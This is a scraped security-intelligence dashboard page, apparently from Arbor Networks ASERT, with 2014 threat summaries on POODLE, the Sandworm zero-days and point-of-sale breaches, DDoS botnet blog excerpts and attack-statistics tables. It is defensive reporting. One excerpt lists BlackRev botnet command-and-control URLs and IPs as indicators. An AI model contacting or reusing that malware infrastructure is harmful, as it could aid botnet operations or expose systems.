Dashboard Global

ASERT Security Intelligence

Summary: Microsoft, Oracle, and Adobe released a large batch of updates for vulnerabilities in multiple products including Microsoft Internet Explorer, Microsoft Office, Java, and Adobe Flash Player. Users and administrators are encouraged to patch as soon as possible. Three Microsoft zero-day vulnerabilities, patched in the update this week, are reportedly being exploited in the wild in limited, targeted cyber espionage attacks. Given the popularity of these applications and systems, it is likely that attackers will continue to target unpatched machines. Another major vulnerability was reported this week with news of the POODLE attack targeting SSL version 3. Although SSLv3 has been succeeded by TLS, it is still used when TLS is unavailable, and could be exploited by a man-in-the-middle attack to extract data from secure HTTP connections. If possible, SSLv3 should be disabled on both the server side and client-side browsers. News of POS compromises continues, as Kmart and Dairy Queen have disclosed information on recent payment data breaches. Dairy Queen was targeted with the Backoff POS malware after attackers obtained account credentials from a third-party vendor. Kmart, meanwhile, has not disclosed details about the malware involved except that it went undetected by their antivirus solutions.

Title: SSL 3.0 Vulnerable to “POODLE” Attack
Severity Level: Extreme Severity
Published: Fri, 17 Oct 2014 10:51:10 +0000
A vulnerability in SSL version 3 (CVE-2014-3566) has been disclosed with the development of the "POODLE" attack (Padding Oracle On Downgraded Legacy Encryption). The attack allows a man-in-the- middle to extract data from secure HTTP connections. This can have serious ramifications as most TLS clients allow the use of SSLv3 when TLS 1.0 or higher is unavailable, possibly allowing an attacker to find a situation where an SSLv3 connection can be forced in order to capture sensitive data.

Title: POS Attacks Continue: Kmart, Dairy Queen Disclose Recent Breaches
Severity Level: Elevated Severity
Published: Fri, 17 Oct 2014 10:51:10 +0000
Dairy Queen has announced that nearly 400 US stores were hit with a malware attack using a variant of the Backoff POS malware. Kmart has also announced this week that its POS registers were compromised with malware: 1,200 stores were reportedly infected over the past month.

Title: Multiple Microsoft Zero-day Vulnerabilities Exploited in Targeted Attacks
Severity Level: Normal Severity
Published: Fri, 17 Oct 2014 10:51:10 +0000
Three zero-day vulnerabilities patched by Microsoft this week have reportedly been exploited in targeted attacks. The first (CVE-2014-4114) is a vulnerability present in every supported version Windows as well as Windows Server 2008 and 2012; the flaw, which is found in the OLE package manager, could allow remote code execution if the victim opens a specially crafted Microsoft Office document. The vulnerability was exploited, often in conjunction with other vulnerabilities, starting in August in an attack campaign dubbed "Sandworm”. Attackers used spear phishing emails with malicious PowerPoint documents to target NATO, Ukrainian, and Western government organizations as well as energy sector, telecommunications, and US academic entities. Sandworm is believed to be the work of Russian hackers for cyber espionage purposes. The malicious documents were used to deliver BlackEnergy malware onto targeted systems in order to exfiltrate data, activity that was profiled earlier this summer by other security researchers. Although BlackEnergy was originally popular among cybercriminals, it and other cybercrime tools like banking trojans have increasingly been observed in targeted espionage campaigns as well. Two other Windows Kernel 0-days, patched by Microsoft this week, were also reportedly used in limited, targeted attacks. The two vulnerabilities (CVE-2014-4148 and CVE-2014-4113), left unpatched, can be exploited for elevation of privilege in order to execute code within the context of the Windows Kernel. One campaign has reportedly been linked to threat actors in China actively using CVE-2014-4113 since February, along with other local privilege escalation vulnerabilities.

Title: Critical Patches Released by Microsoft, Oracle, and Adobe
Severity Level: Extreme Severity
Published: Fri, 17 Oct 2014 10:51:10 +0000
Microsoft, Oracle, and Adobe all released security updates on Tuesday.

[more]

IETF Discusses Deprecating IPv6 Fragments

The IETF IPv6 maintenance working group has begun discussions about deprecating IPv6 fragmented packets, spurred by the IETF Internet-Draft, “IPv6 Fragment Header Deprecated”. As one can guess, this draft has generated a lot of discussion (Although the Internet Draft discusses deprecation of the IPv6 fragment header, deprecation of the header would effectively deprecate IPv6 fragmented packets).

As I noted in an earlier posting here, fragments in IPv6 can create havoc in networks from an operational and a security perspective, [...]
Wed, 10 Jul 2013 15:55:39 +0000

DirtJumper’s DDoS Engine Gets a Tune-Up with new “Drive” Variant

Over the last few months ASERT has been tracking what appears to be a new variant in the DirtJumper family (for more information on the history of the DirtJumper family see our previous posts [ 1 ] [ 2 ] [ 3 ] ) – that we have dubbed “Drive.” Drive is written in Delphi and sports a new and much more powerful DDoS engine than its predecessors. It has also changed the format of attack commands [...]
Wed, 19 Jun 2013 15:44:26 +0000

The Revolution Will Be Written in Delphi

Since it has been a little while since we profiled a DDoS botnet family on the blog, let’s take a look at Trojan.BlackRev (also known as the “Black Revolution” trojan.) It was named for the Mutex set in early versions of the malware. This family is interesting from a research perspective because there are at least four revisions in the wild showing its progression from a basic DDoS bot to a more advanced one.

RevMD5C&C URLC&C IP106d8da1e14cff81ca2fad02d2a878c72http://userhaos.ru/113/bot/gate.php91.105.232.1052c9c6aeacee9f973ca0ca5da101a12a16http://ergoholding.ru/rev/gate.php91.204.122.1002.57141cacc3f4a191015a176947a403b79http://clfrev.ru/rev/panel/gate.php93.170.130.1123eae553d72142f9dcb06c5c134015fe7ahttp://ergoholding.ru/ddd/gate.php91.204.122.100

The programming language used is [...]
Tue, 21 May 2013 17:57:06 +0000

Syria goes dark, once more

Last week, Syria was taken offline, as our ATLAS data showcased very clearly.

Today, Syria is once again in the dark, as highlighted by the following ATLAS data below.

Syria051513

We’re keeping an eye on the situation in Syria and will update this post with new information if and when it becomes available.


Wed, 15 May 2013 14:58:50 +0000

Syria taken offline

ATLAS is Arbor Networks innovative, one-of-a-kind Internet monitoring system. ATLAS is a collaborative effort with 250+ ISPs globally who have agreed to share anonymous traffic data on an hourly basis (leveraging Arbor’s technology that sits on ISP networks), together with data from Arbor dark address monitoring probes, as well as third-party and other data feeds. In total, ATLAS is seeing 42Tbps of peak IPv4 traffic. With this unique vantage point, Arbor is ideally positioned to deliver intelligence about malware, exploits, phishing [...]
Wed, 08 May 2013 11:07:38 +0000

[more]

01

Top Attacks   (past 24 hours) ↑ ↓ _

Description Attacks per subnet Change from yesterday CVE Percentage
Setup.php access 160.87 +23.9 %
37.2%
VNC network scanning activity 89.54 -38.6 %
20.7%
SSH brute-force login attempts 13.51 -40.8 %
3.1%
MYSQL brute-force login attempts 13.28 -34.6 %
3.1%
[more]
 
Description Attacks per subnet Change from yesterday CVE Percentage
SNMP MS Windows getbulk request 7.66 +248.4 % CVE-2006-5583
1.8%
POLICY Incoming Basic Auth Base64 HTTP Password detected unencrypted 2.00 +113.1 %
0.5%
POLICY Outgoing Basic Auth Base64 HTTP Password detected unencrypted 2.00 +113.1 %
0.5%
[more]
 
02

Top Scanned Services   (past 24 hours) ↑ ↓ _

Description Traffic per subnet Change from yesterday Latest CVE Percentage
UDP/0 159.77 kB +inf % CVE-1999-0675
21.7%
UDP/3395 (dyna-lm) 87.18 kB -33.7 %  
11.9%
UDP/5060 (sip) 69.95 kB -14.1 % CVE-2006-0189
9.5%
UDP/4614 46.85 kB -29.4 %  
6.4%
UDP/514 (syslog) 34.56 kB +54.4 %  
4.7%
[more]
 
Description Traffic per subnet Change from yesterday Latest CVE Percentage
UDP/0 159.77 kB +inf % CVE-1999-0675
21.7%
TCP/7212 14.11 kB +inf %  
1.9%
TCP/1433 (ms-sql-s) 7.91 kB +inf % CVE-2008-5416
1.1%
UDP/19 (chargen) 6.34 kB +inf %  
0.9%
UDP/3146 (bears-02) 5.94 kB +inf %  
0.8%
[more]
 
03

Top Threat Sources   (past 24 hours) ↑ ↓ _

Country Rank Attacks per subnet Scans per subnet Botnets Phishing DoS
US (United States) 1 13 33.26 kB 4 13288 2823
ZA (South Africa) 2 91 194.37 kB 0 99 0
FR (France) 3 2 7.92 kB 7 3987 300
DE (Germany) 4 9 36.82 kB 3 1775 648
IR (Iran) 5 0 98.15 kB 0 75 189
GB (Great Britain) 6 0 18.15 kB 2 1055 736
KR (South Korea) 7 1 2.73 kB 3 70 1328
CN (China) 8 18 15.98 kB 4 368 758
NL (Netherlands) 9 11 24.51 kB 4 656 389
TR (Turkey) 10 0 185.95 B 0 1491 222
BR (Brazil) 11 3 2.54 kB 0 891 460
CA (Canada) 12 5 2.28 kB 2 1306 207
RU (Russian Federation) 13 11 27.56 kB 5 427 162
AU (Australia) 14 0 308.60 B 0 882 251
EU (European Union) 15 0 11.92 kB 0 851 18
MY (Malaysia) 16 0 13.72 B 0 218 524
IT (Italy) 17 0 451.57 B 1 931 71
ES (Spain) 18 5 3.40 kB 0 456 274
IN (India) 19 16 17.48 kB 0 276 111
IL (Israel) 20 59 19.09 kB 1 183 109
 
ASN Rank Attacks per subnet Scans per subnet Botnets Phishing DoS
AS16276 (OVH) 1 0 0 B 4 3657 71
AS37053 (RSAWEB-AS,ZA) 2 82 124.27 kB 0 0 0
AS12880 (DCI-AS) 3 0 50.25 kB 0 0 41
AS3741 (IS,ZA) 4 7 41.74 kB 0 0 0
AS4134 (CHINANET-BACKBONE) 5 12 6.79 kB 0 368 258
AS46606 (UNIFIEDLAYER-AS-1) 6 0 0 B 0 934 0
AS26496 (AS-26496-GO-DADDY-COM-LLC) 7 0 0 B 0 895 0
AS24940 (HETZNER-AS) 8 2 3.65 kB 0 529 96
AS11042 (LANDIS-HOLDINGS-INC) 9 0 0 B 0 777 0
AS23352 (SERVERCENTRAL) 10 0 0 B 0 747 0
AS42910 (SADECEHOSTING-COM) 11 0 0 B 0 691 0
AS12586 (ASGHOSTNET) 12 0 0 B 0 689 0
AS46664 (VOLUMEDRIVE) 13 0 19.14 kB 0 99 22
AS29073 (ECATEL-AS) 14 10 18.03 kB 1 0 42
AS16265 (FIBERRING) 15 1 809.18 B 1 292 150
AS4766 (KIXS-AS-KR) 16 0 0 B 2 0 319
AS9116 (GOLDENLINES-ASN) 17 59 18.94 kB 0 0 0
AS32780 (HOSTINGSERVICES-INC) 18 0 0 B 0 574 0
AS36476 (WEB-COM-ASN1) 19 0 0 B 0 570 0
AS13301 (UNITEDCOLO-AS) 20 0 19.03 kB 0 0 0